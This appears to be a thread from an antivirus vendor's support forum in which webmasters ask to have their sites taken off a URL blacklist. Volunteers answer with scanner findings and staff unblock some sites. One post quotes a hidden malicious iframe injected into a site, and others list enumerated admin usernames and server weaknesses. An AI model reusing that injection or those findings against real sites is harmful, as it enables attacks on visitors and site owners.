The URL abinpet.org.br was never on our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 03, 2015, 09:44:01 AM
i guess that means avast only detected the iFrame and when that is removed detection should be gone

https://www.virustotal.com/en/file/fd1f20fdb19d00f27dcec4aa48652ba5b0c2307f5552a4ca73c851715ef66b44/analysis/1441231069/

Sucuri   https://sitecheck.sucuri.net/






Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 03, 2015, 10:04:11 AM
Can be normally visited, AOS does not flag.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: david765 on September 10, 2015, 06:06:49 PM
Can you tell me why my site is blocked? It comes up clean in every scan I have run.

http://www.eanescomfort.com

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 10, 2015, 06:51:59 PM
Probably a general IP block. Re: https://www.virustotal.com/nl/ip-address/65.75.137.200/information/
There are however jQuery vulnerability issues on that site: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.eanescomfort.com
Sucuri and Quttera gives site as clean.
WP issues: WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

wp-live-chat-support   latest release (5.0.5)
http://www.wp-livechat.com
wp-google-maps   latest release (6.3.00)
http://www.wpgmaps.com
revslider   
js_composer   
go_pricing   
icegram   latest release (1.9.6)
http://www.icegram.com/
recent-tweets-widget   latest release (1.6.4)
http://wordpress.org/extend/plugins/recent-tweets-widget/
Ultimate_VC_Addons   
table-generator   latest release (1.2)
http://wpgurus.net/
srizon-youtube-album-pro   
contact-form-7   latest release (4.2.2)
http://contactform7.com/
constant-contact   latest release (10.3)
http://www.gopiplus.com/work/2010/07/18/constant-contact/

Theme: The theme has been found by examining the path /wp-content/themes/ *theme name* /

 The7.2 1.0.1http://dream-theme.com/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

User ID 1 : admin
User ID 2 : John Eanes
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled

Linked iFrames
Compromised sites will often contain embedded iframes that can also deliver malicious code to visitors of the web site. Check any discovered iframes and ensure they are legitimate.

http://www.youtube.com/embed/eAquQaiPs3E?feature=oembed

You could try to configure as to my recommendations so to no longer get the warnings. Ask Avast to exclude you from their general blocking.
We cannot unblock as we are only volunteers with relevant knowledge, but no Avast team members, they are the only ones to unblock.

Also consider somne DNS issues found up here: http://www.dnsinspect.com/eanescomfort.com/1441902253
WARNING: MX records duplicates (same IP address):
64.233.162.27: [alt1.aspmx.l.google.com. aspmx2.googlemail.com.]
Although technically valid, duplicate MX records have no benefits and can cause confusion.
WARNING: Found mail servers with inconsistent reverse DNS entries. You should fix them if you are using those servers to send email.
Server   IP   PTR (Reverse)   IPs
aspmx.l.google.com.   64.233.167.27   ?   ?

See: http://sitevet.com/db/asn/AS36444
IP commonName=*.asoshared.com  OpenSSH 5.3 (protocol 2.0) Exim smtpd 4.85 draenor.asoshared.com
http/1.1
|_  x-mod-spdy/0.9.4.3-146826
Service Info: Host: draenor.asoshared.com Redwood.City
-http://cse.google.com/cse?cx=partner-pub-7151396906610147:7uzfly-ti4n&q

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: david765 on September 10, 2015, 08:54:00 PM
Thanks. What's the best way to contact them to have it excluded?
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on September 10, 2015, 09:20:07 PM
What's the best way to contact them to have it excluded?

Contact here
Submit a ticket at https://support.avast.com/Tickets/Submit

-> Avast Virus lab
Title: Re: How to remove my website from your blacklist?
Post by: david765 on September 10, 2015, 09:21:11 PM
Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on September 10, 2015, 09:27:20 PM
Thanks!

You are welcome !
Title: Re: How to remove my website from your blacklist?
Post by: ozioeh on September 15, 2015, 09:19:28 PM
Hi,
my site

http://www.woomyung.com/ (http://www.woomyung.com/)
 have been blocked (url mal) during long times.

I tested  using almost recommended web checking site, but didn't find any issue.
And continusoly reported as false positive report, but didn't changed.

thank you.

 




Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 15, 2015, 10:32:09 PM
DNS issue: Allow TCP connections
WARNING: Couldn't connect using TCP protocol:
tcp4:1.201.102.134
Check your name server's configurations and firewall rules. When response to a DNS query exceeds 512 bytes, TCP is negotiated and used, all name servers should allow TCP connections (port 53).
Did not follow redirect to http://www.ec2-54-191-33-241.us-west-2.compute.amazonaws.com/
Website risk status 7 red out of 10: http://toolbar.netcraft.com/site_report?url=http://www.ec2-54-191-33-241.us-west-2.compute.amazonaws.com
jquery.easing.1.3.js hacked for hotlinking?
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwoomyung.com

See no direct known threats, wait for an explanation from Avast team for the URL:Mal general detection.
Reason for the general detection is probably the nameserver: Domain found using -*.whoisdomain.kr as name server
see: http://www.malwareurl.com/ns_listing.php?ns=ns4.whoisdomain.kr  with trojans and backdoors.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 16, 2015, 08:48:30 AM
Re eanescomfort.com:
The URL was removed from our blacklist yesterday - most likely based on your report.

Re woomyung.com:
It was added to our blacklist because of DNS hijack. I hope the matter is now resolved, so I am unblocking the domain now.
Title: Re: How to remove my website from your blacklist?
Post by: ozioeh on September 16, 2015, 01:57:28 PM
Thank you so much
Title: Re: How to remove my website from your blacklist?
Post by: Krzysztof60 on October 16, 2015, 02:58:59 PM
Hello,
my site www.krzysztofkarpinski.pl is on Your blacklist.

Users who use AVAST can not get to my site.
The website is now clean and safe - confirm you can find here www.siteadvisor.com
What can I do to remove the page from your blacklist?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 16, 2015, 04:46:52 PM
Witam Panie Krzysztofie!

This comes in English because this part of the forums is,

Fortinet webfilter is flagging the website, https://www.virustotal.com/nl/url/24a3718291ca18b88cba3d7832b39336b28136c90eab8cf2b7b625c7000ccdac/analysis/1445003923/

By the way you have the following WP misconfiguration:Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled
/wp-content/plugins/ disabled

Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directores. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.

Vuln.: Results from scanning URL: http://krzysztofkarpinski.pl/wp-includes/js/jquery/jquery.js?ver=e237b87e9ac201aedbe95acc6d03803a
Number of sources found: 43
Number of sinks found: 19

Also considering the discussion here: https://productforums.google.com/forum/#!topic/webmaster-pl/d6rq5mBbpCc (po polsku)  Do a scan here: urlquery dot net and there you will see what Fortinet flags. Wait until back online as it now is down.
Avast flags a general URL:Mal alert for chrome.exe.

My bet is the problem is not with your site but the hoster, see badness history (trojans and droppers) https://www.virustotal.com/nl/ip-address/87.98.239.87/information/

pozdrawiam,

Damian aka polonus (volunteer website security analyst and website error-hunter)

Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 16, 2015, 10:40:08 PM
Re: http://urlquery.net/report.php?id=1445027045186
The malware flagged  detected by Fortinet's, verified on 2015-10-16
18 suspicious files on IP see: http://urlquery.net/report.php?id=1444685724978
You certainly should take things up with the hoster - Blacklisted URLs: 11864
22 instances of malware on another domain with that same IP.  :o

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on October 18, 2015, 10:03:51 AM
Unblocked ;-)
The reason was money fraud at krzysztofkarpinski.pl/log/kmart.tar.gz, in case anyone is wondering :-)
Title: Re: How to remove my website from your blacklist?
Post by: Krzysztof60 on October 19, 2015, 02:02:06 PM
AVAST actually no longer blocks my website - thank you :)

Polonus - thank you for your commitment and a large amount of valuable information.
Indexing already disabled - I think so :)
As for the rest I have to ask for help from someone who knows how and what to do next;)

Anyway - Thank you for your help :D
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 19, 2015, 03:14:24 PM
For expert help you might contact Redleg, the man behind File Viewer -> https://aw-snap.info/file-viewer/
To jest za darmo.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: rich35 on October 30, 2015, 08:19:30 PM
Hi,

Can you unblock our website illo-online.com please.

Title: Re: How to remove my website from your blacklist?
Post by: essexboy on October 30, 2015, 10:13:29 PM
Received this in addition to the avast certificate warning

Quote
Turn on TLS 1.0, TLS 1.1 and TLS 1.2 in Advanced settings and try connecting to https://illo-online.com  again. If this error persists, it is possible that this site uses an unsupported protocol. Please contact the site administrator.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 02, 2015, 03:55:49 PM
hxxps://illo-online.com/

Secure connection: fatal error (44)

The certificate has been revoked by its issuer.
It is no longer valid.
In the worst case it may be used by criminals for fraudulent purposes.
The website owner must immediately replace the certificate.
Title: Re: How to remove my website from your blacklist?
Post by: Andrey101 on November 12, 2015, 01:31:55 PM
Hi
could you please remove images on iamsync.com from blacklist?
For example the image is blocked: https://iamsync.com/organization/css/img/copyright.gif
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 12, 2015, 01:57:46 PM
avast is not blocking that image.
There is a IP block.
http://zulu.zscaler.com/submission/show/552fe507ef8d9998627cc44dee08ba31-1447332474
http://multirbl.valli.org/lookup/54.93.111.46.html

NS and MX problems
http://www.dnsinspect.com/iamsync.com/1447332843

For removal requests
https://www.avast.com/contact-form.php?subject=VIRUS-FILE
Title: Re: How to remove my website from your blacklist?
Post by: TT-111 on November 17, 2015, 12:46:31 PM
Please remove my webpage from blacklist.  Site: www.meveda.ee

We have removed the malware.

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 17, 2015, 12:53:32 PM
Peoples, do NOT post live links to websites that avast is blocking.
We do not want anyone to visit websites that are (potentially) harmful.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on November 17, 2015, 12:57:12 PM
Please remove my webpage from blacklist.  Site: www.meveda.ee

We have removed the malware.

Thanks!
It containe Pharmacy spam   https://sitecheck.sucuri.net/results/www.meveda.ee

Title: Re: How to remove my website from your blacklist?
Post by: TT-111 on November 17, 2015, 03:49:53 PM
Yep, it contained spam. It has been removed by now.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on November 17, 2015, 04:07:14 PM
Yep, it contained spam. It has been removed by now.
Sucuri still report it  https://sitecheck.sucuri.net/results/www.meveda.ee

you can click the:  *Cached results from a few minutes ago.Force a Re-scan to clear the cache. 

Title: Re: How to remove my website from your blacklist?
Post by: lthirteenthl on February 20, 2016, 11:09:09 AM
Hello, could you check a8d.ru and remove from blacklist. I think it doen't contain viruses.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on February 20, 2016, 11:14:15 AM
Hello, could you check a8d.ru and remove from blacklist. I think it doen't contain viruses.
On lots of Blacklists
https://www.virustotal.com/en/url/222c16ee2f6382642d55078006576b38c6d3bceb32a0bf03e33d2a2ac616b216/analysis/1455963222/

URLvoid  http://www.urlvoid.com/scan/a8d.ru/

IP history  https://www.virustotal.com/en/ip-address/31.170.164.166/information/
Multiple domains on same IP and many are blacklisted ... click more button under list(s) for more info

IPvoid  http://www.urlvoid.com/ip/31.170.164.166

WOT info  https://www.mywot.com/en/scorecard/a8d.ru

html scan - redirect infection
https://www.virustotal.com/en/file/9bb6058b5649b619b29b8ad439176d1aebbdf03debeaeb21e65161cae5766021/analysis/1455978532/

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 20, 2016, 03:04:35 PM
Blacklisted, non trusted host, security risks :
http://zulu.zscaler.com/submission/show/0cb05030d9bcee771850c175af37d13c-1455976244

Blacklisted :
http://urlquery.net/report.php?id=1455976345102
http://www.siteadvisor.com/sites/a8d.ru

Blacklisted and infected :
https://sitecheck.sucuri.net/results/a8d.ru

Blacklisted, infected, liks to blacklisted domains/ip's :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=a8d.ru

IDS problems on the ASN :
http://urlquery.net/report.php?id=1455976515202

Vulnerable code/security risk :
http://retire.insecurity.today/#!/scan/d415677d99fdf53d54e7df59f487926f20b1c0ed8d9dedf84671377c8b107423

Multiple SSL/TLS problems :
https://www.ssllabs.com/ssltest/analyze.html?d=a8d.ru
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 20, 2016, 03:23:26 PM
Hi Eddy,

In scanning the URL format may come up as invalid.
Now we see MX and Mail issues here: http://www.dnsinspect.com/a8d.ru/1455977996
Allthough we have currently not seen any ZeuS C&Cs resolved thru the DNS Nameserver ns2.hostinger.ru.

If that is not convincing enough then see the 18 reports here: https://www.mywot.com/en/scorecard/a8d.ru?utm_source=addon&utm_content=popup
Scareware and scammer site. Avast Online Security flags this site as "unsafe".

When we consider this little scan and where it comes to land we see they are also 'pill ad-scammers":
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fa8d.ru%2Fjs%2Fbootstrap.min.js
going to: Results from scanning URL: -https://adf.ly/fp.rev3.php?nocache=1
Number of sources found: 38
Number of sinks found: 21
and where we luckily do not find sources detected:
Results from scanning URL: -http://static.adf.ly/static/js/view58.js
Number of sources found: 0
Number of sinks found: 2

Going to the link I gave  -http://a8d.ru/js/bootstrap.min.js I get three warnings kicked up to stay away: one from WOT, one from AOS and one from Bitdefender TrafficLight.
The website certainly should get off of all these blacklistings and clean their bill of web rep to again get unblocked it seems.
But the final verdict should as always come from an Avast Team Member off-course, we here are just volunteers with relevant know-how.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 20, 2016, 03:41:48 PM
Update (info credits and thanks go out to our forum friend, Pondus)

Sophos has this message
Quote
-a8d.ru/#

Access to this page is blocked as the threat Mal/HTMLGen-A has been found on this website.

polonus

Well what code is actually being flagged there as we find these as scripts included:
-js/jquery-1.8.3.min.js
-js/bootstrap.min.js
-js/main.js
-http://html5shim.googlecode.com/svn/trunk/html5.js
-http://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js

Damian
Title: Re: How to remove my website from your blacklist?
Post by: Наталья26 on February 21, 2016, 07:49:41 AM
Good day! Avast blocks the site webcam-arabatka.in.ua the web site has revealsa viruses on it. Please help me to understand. :o :o :o
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on February 21, 2016, 07:54:24 AM
Good day! Avast blocks the site webcam-arabatka.in.ua the web site has revealsa viruses on it. Please help me to understand. :o :o :o
-> https://sitecheck.sucuri.net/results/webcam-arabatka.in.ua
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 21, 2016, 10:31:13 PM
There is this iFrame there:
Code: [Select]
<iframe id="a1996667054" style="display: none;" src="-https://al9l235gkc7d.ru/f.html" width="300" height="150"></iframe> Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2
Javascript: -al9l235gkc7d.ru

Linked javascript check:
Vulnerable jQuery library: -http://webcam-arabatka.in.ua
Detected libraries:
jquery-migrate - 1.2.1 : -http://webcam-arabatka.in.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.11.3 : -http://webcam-arabatka.in.ua/wp-includes/js/jquery/jquery.js?ver=1.11.3
jquery - 2.1.4 : (active1) -http://webcam-arabatka.in.ua/wp-content/themes/byzantium/js/jquery-2.1.4.min.js?ver=20151029
(active) - the library was also found to be active by running code
1 vulnerable library detected

With WordPress check on this plug-in:

ditty-news-ticker   latest release (2.0.6) *
http://dittynewsticker.com/

Warning User Enumeration is possible  :o admin-webcam and denis -> It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Script blockers will block link to: -http://w.uptolike.com/

polonus volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: qsilvererie on February 26, 2016, 01:54:34 AM
My personal website is now coming up blocked as URL:Mal. I've checked with Sucuri, urlvoid, surbl, everything says it's not blocked. This is really starting to drive me nuts. hxxp://qsilver.dx.am. Why is this getting blocked?
Title: Re: How to remove my website from your blacklist?
Post by: medvid on February 26, 2016, 11:16:10 AM
My personal website is now coming up blocked as URL:Mal. I've checked with Sucuri, urlvoid, surbl, everything says it's not blocked. This is really starting to drive me nuts. hxxp://qsilver.dx.am. Why is this getting blocked?

it will be fixed in next VPS
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on February 26, 2016, 08:11:47 PM
Please remove my webpage from blacklist.  Site: www.meveda.ee

We have removed the malware.

Thanks!

Detection site was removed

Good day! Avast blocks the site webcam-arabatka.in.ua the web site has revealsa viruses on it. Please help me to understand. :o :o :o

this was fixed in the update VPS 160225-1
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 26, 2016, 08:17:31 PM
Good it was removed from blocking,
but now also mitigate the issues reported,
to harden the website's security.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 27, 2016, 12:48:57 AM
a8d.ru unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: qssam on February 29, 2016, 12:59:32 PM
Hello,

Our website is currenly being blocked by Avast: www.quietstorm.net

With the infection message: URL:Mal

We have checked the site with the following, all showing no problems:-

http://www.urlvoid.com/scan/quietstorm.net/
https://www.virustotal.com/en/url/a3b869526c5ff261f695347ad847f5f6d62e15ea29f391a3a28264da0ea39f04/analysis/1456744348/
http://zulu.zscaler.com/submission/show/109fbf37214e065fc06ffa1d73a17128-1456744681
https://sitecheck.sucuri.net/results/www.quietstorm.net/
http://urlquery.net/report.php?id=1456744940589

Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 29, 2016, 01:15:42 PM
quietstorm.net unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: jllj on March 11, 2016, 06:46:07 AM
Hello,

Our website is currenly being blocked by Avast: www.hansafincon.com
With the infection message: URL:Mal

We checked the site with the following, all showing no problems:

http://www.urlvoid.com/scan/hansafincon.com/
https://www.virustotal.com/en/url/cc4bf887bc51e38518d767a6c0acfc87b62c028a798d6fafda414a3f86c888e8/analysis/
https://sitecheck.sucuri.net/results/hansafincon.com

Pls remove the site from blacklist.

Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 11, 2016, 09:54:51 AM
hansafincon.com unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 11, 2016, 11:42:12 AM
jllj
you also need to fix the JQuery problem
http://retire.insecurity.today/#!/scan/417e214065db7ed2d4934bb7caa2e9055100e21051a83cf55452c3d35dc49bca
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 11, 2016, 02:10:27 PM
I still find it blocked by Avast as with URL:Mal - http://isithacked.com/check/hansafincon.com

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Jon98 on March 14, 2016, 07:35:35 PM
Hello,

My website is currenly being blocked by Avast  :( : www.mega-telechargement.com and www.drague-seduction.com

We checked the site with the following, all showing no problems:

https://www.virustotal.com/en/url/0f8f9b4c22b022d29992ba9a23697928ab7ed7c966fc564ef9e621f075aec232/analysis/
https://sitecheck.sucuri.net/results/www.mega-telechargement.com

Please remove the site from blacklist.

Thank you.

ps: sorry for my poor english, iam french  :)
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 14, 2016, 08:37:47 PM
It's been reported to Avast. :)
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 14, 2016, 08:42:07 PM
I believe the image says enough.

And this also tells enough :
https://gcache.ghostery.com/en/gcache/?n=TWFsd2FyZQ%3D%3D&s=aHR0cDovL3d3dy5qdXF1ZXJ5LmNvbS9jb21wYWJpbGl0eS5waHA%2FMC4xNjc1MzI0MjY3NDE3Mjcy
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 15, 2016, 10:01:13 AM
mega-telechargement.com unblocked;
drague-seduction.com was never blocked.
Title: Re: How to remove my website from your blacklist?
Post by: Pavel137 on March 29, 2016, 08:46:51 PM
Hi, some my sites is in blacklist, but they are clean

http://allonltd.com.ua/

https://www.virustotal.com/uk/url/f2838378f2e2532357cbdc921ede9b0dc36752c14d4fc7110f4e2528d06ff897/analysis/1459276495/
https://sitecheck.sucuri.net/results/allonltd.com.ua/
http://zulu.zscaler.com/submission/show/c0353fa9206818555923b5192ebba52e-1459276691
http://www.urlvoid.com/scan/allonltd.com.ua/
http://urlquery.net/queued.php?id=1118276886

http://cleaning-kiev.com

http://www.urlvoid.com/scan/cleaning-kiev.com/
https://sitecheck.sucuri.net/results/Cleaning-kiev.com/
https://www.virustotal.com/uk/url/1fa9b1ada7f4bd2f9058e2cfc1808bef5cd2a7d3587f038bcc0233bcb3d1a8f4/analysis/
http://urlquery.net/queued.php?id=1118282591
http://zulu.zscaler.com/submission/show/10fb05bbd2c43e8ee99044b284c9a7e3-1459276947

http://Uborka-kiev.com

http://www.urlvoid.com/scan/uborka-kiev.com/
https://www.virustotal.com/uk/url/5371d383de197f8c40f2dc19bc989afc7b5e98ae273adce0e172db42c6a52391/analysis/
https://sitecheck.sucuri.net/results/uborka-kiev.com/
http://urlquery.net/queued.php?id=1118288391
http://zulu.zscaler.com/submission/show/983871694b1c0378e25e60fdad34f3ef-1459277063


Please remove it from blacklist. Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 29, 2016, 09:14:47 PM
If they are blacklisted, pleas make them non clickable.
Use hxxp or hxxps
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 29, 2016, 09:32:24 PM
Malicious code :
http://evuln.com/tools/malware-scanner/allonltd.com.ua

Suspicious code (could be harmful) :
http://quttera.com/detailed_report/allonltd.com.ua

Suspicious script and error page :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=allonltd.com.ua

Outdated software used :
https://sitecheck.sucuri.net/results/allonltd.com.ua

IDS on the same IP :
http://urlquery.net/report.php?id=1459279177548

Missing security settings in the header(s) :
https://securityheaders.io/?q=allonltd.com.ua

JQuery security problems :
http://retire.insecurity.today/#!/scan/14f10850f7ddda03e8b13df03c20debbb8383f4e99ebb28b04bceeb3d2dc586e

It would not surprise me if avast has found more problems than the ones I listed here.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 29, 2016, 10:06:50 PM
I do not see anything malicious at allonltd.com.ua right now, so I am unblocking it.
cleaning-kiev.com and uborka-kiev.com were never blocked.
Title: Re: How to remove my website from your blacklist?
Post by: Pavel137 on March 29, 2016, 10:11:44 PM
Malicious code :
http://evuln.com/tools/malware-scanner/allonltd.com.ua

Suspicious code (could be harmful) :
http://quttera.com/detailed_report/allonltd.com.ua

Suspicious script and error page :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=allonltd.com.ua

Outdated software used :
https://sitecheck.sucuri.net/results/allonltd.com.ua

IDS on the same IP :
http://urlquery.net/report.php?id=1459279177548

Missing security settings in the header(s) :
https://securityheaders.io/?q=allonltd.com.ua

JQuery security problems :
http://retire.insecurity.today/#!/scan/14f10850f7ddda03e8b13df03c20debbb8383f4e99ebb28b04bceeb3d2dc586e

It would not surprise me if avast has found more problems than the ones I listed here.

Oh, thank you for your answer, I will resolve this problems, and if avast will continue to block sites, I`ll reply to you.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 29, 2016, 11:36:50 PM
I just checked and avast does not block the site anymore.

If it says otherwise on your system it is likely avast's cache that need to be refreshed.
- disable the shields
- wait e.g. 5 minutes
- enable them again
- check if avast is still blocking the site on your system
or
reboot your system

And yes, please resolve the things I mentioned.
As you (should and likely do) know often security issues are fixed in newer versions of software.
Using old server and CMS software makes your site not as secure as it can/should be. ;)
Title: Re: How to remove my website from your blacklist?
Post by: st0rm on March 31, 2016, 11:22:12 PM
My website is currenly being blocked by Avast : snaphack.org

We checked the site with the following, all showing no problems:

https://www.virustotal.com/fr/url/b0ec3ecb0a96427af6b5967241e2d6edd52cb4302c98ebfaf7b0257a6d569a8f/analysis/1459459194/
https://sitecheck.sucuri.net/results/snaphack.org/

Thanks in advance
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 31, 2016, 11:31:14 PM
URL:Mal = IP and/or Domain is blacklisted

Blacklisted / malicious :
https://www.virustotal.com/en/ip-address/185.66.140.181/information/
http://zulu.zscaler.com/submission/show/fce4102e88c49146458ddf46027a649b-1459459444
https://www.virustotal.com/en/url/b0ec3ecb0a96427af6b5967241e2d6edd52cb4302c98ebfaf7b0257a6d569a8f/analysis/
http://multirbl.valli.org/lookup/185.66.140.181.html

JQuery security risks :
http://retire.insecurity.today/#!/scan/f9429df8a4d3a8684f32a45eb9c0956e58809e1d66ff5ac7289160d0c3a5d5e6
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 31, 2016, 11:59:23 PM
Apart from what Eddy mentions in his report, pay attention to the following finds:

Server header security certainly not optimal with a meagre F-Status: https://securityheaders.io/?q=snaphack.org
Nameserver is DROWn vulnerable: https://test.drownattack.com/?site=ns13.knownsrv.com

snaphack.org

Please contact the Certificate Authority for further verification.
You have 1 error
Wrong certificate installed.
The domain name does not match the certificate common name or SAN.
Warnings
BEAST
The BEAST attack is not mitigated on this server.
RC4
This server uses the RC4 cipher algorithm which is not secure. Disable the RC4 cipher suite and update the server software to support the Advanced Encryption Standard (AES) cipher algorithm. Contact your web server vendor for assistance.
SSLv3
This server uses the SSLv3 protocol which is not secure. Disable the SSLv3 protocol and enable a higher protocol version. Contact your web server vendor for assistance.
Root installed on the server.
For best practices, remove the self-signed root from the server.
Certificate revocation check failed.
Try the certificate installation check again.
This server is vulnerable to:
Poodle (SSLv3)
This server is vulnerable to a Poodle (SSLv3) attack. If you have not disabled SSLv3 fallback support, disable it now and use TLS 1.2 or higher.
Certificate information
This server uses an Organizationally Validated (OV) certificate. Information about the site owner has been validated by Locivir to help secure personal and financial information.
Common name:
 calendar.locivir.com
SAN:
 
Valid from:
 2016-Jan-09 20:24:02 GMT
Valid to:
 2017-Jan-08 20:24:02 GMT
Certificate status:
 Check failed
Revocation check method:
 Not available
Organization:
 Locivir
Organizational unit:
 Calendar
City/locality:
 Montreal
State/province:
 Quebec
Country:
 CA
Certificate Transparency:
 Not Enabled
Serial number:
 02
Algorithm type:
 MD5withRSA
Key size:
 2048

Re: http://toolbar.netcraft.com/site_report?url=snaphack.org  Yahoo abuse!

There is always the possibility the website comes malware free or detection could be a FP. The vulnerabilities and insecurities should be mitigated however asap.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 01, 2016, 09:47:49 AM
<title>Pirater un compte snapchat 2016
En: Hack an account Snapchat 2016

I think this will stay blocked...
Title: Re: How to remove my website from your blacklist?
Post by: fernando231 on April 06, 2016, 04:26:07 AM
Hi, I'm Fernando, I'm the webmaster of www.universoarmas.com.ar, the site seems to be blacklisted in avast, we had an issue a few months ago, I check the site every week and I cant find any problem but the site is not removed from the blacklist,  I run serveral online check and no error/malware/virus were found.  Can someone help me and point the problem on the site in order to fix it?  Thanks in advance.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on April 06, 2016, 07:20:09 AM
Hi, I'm Fernando, I'm the webmaster of www.universoarmas.com.ar, the site seems to be blacklisted in avast, we had an issue a few months ago, I check the site every week and I cant find any problem but the site is not removed from the blacklist,  I run serveral online check and no error/malware/virus were found.  Can someone help me and point the problem on the site in order to fix it?  Thanks in advance.
On two blacklists here
https://virustotal.com/en/url/73fe97d5f6e71fe7b7e2b9d9247b41aa670ea95a0f092f648b135015868554a1/analysis/1459919865/

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 06, 2016, 08:02:27 AM
I removed universoarmas.com.ar from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: karlh74 on April 14, 2016, 02:14:21 PM
Hi,

Our website www.emailmarketingdesign.co.uk appears on your phishing blacklist.

It's not a phishing website so can you please get this removed this asap.

Many thanks,

Karl
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 14, 2016, 02:50:15 PM
You are wrong.

1] avast doesn't have a phishing blacklist.
2] avast is currently not blocking the site.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 15, 2016, 12:03:05 AM
Well there is problem with that domain name
Quote
This domain cannot be registered because it contravenes the Nominet UK
naming rules. The reason is: the domain name contains too many parts. 
For some issues see: https://seomon.com/domain/www.emailmarketingdesign.co.uk/ssl/
Certificate Not Matches Server Hostname.
The address you entered is unnecessarily exposing the following response headers which divulge its choice of web platform:

Server: nginx/1.8.1
Configuring the application to not return unnecessary headers keeps this information silent and makes it significantly more difficult to identify the underlying frameworks.

18 errors and 8 warnings for the code here: https://seomon.com/domain/www.emailmarketingdesign.co.uk/html_validator/

Insecure IDs tracking: 50% of the trackers on this site could be protecting you from NSA snooping.
Tell emailmarketingdesign.co.uk to fix it.

Missing security headers and accordingly a meagre F-Status: https://securityheaders.io/?q=http%3A%2F%2Fwww.emailmarketingdesign.co.uk

However the SRI hash scan delivers a full A Status: https://sritest.io/#report/2650bde7-90a4-4bd6-8b0e-abfe0804ac40

Third party suspicious web rep: https://www.mywot.com/en/scorecard/emailmarketingdesign.co.uk?utm_source=addon&utm_content=rw-viewsc

nameserver vulnerable to DROWn: https://test.drownattack.com/?site=ns1.hostmonster.com
Comodo Certificate seems correctly installed.

Certificate chain
COMODO RSA Certification AuthorityIntermediate certificate
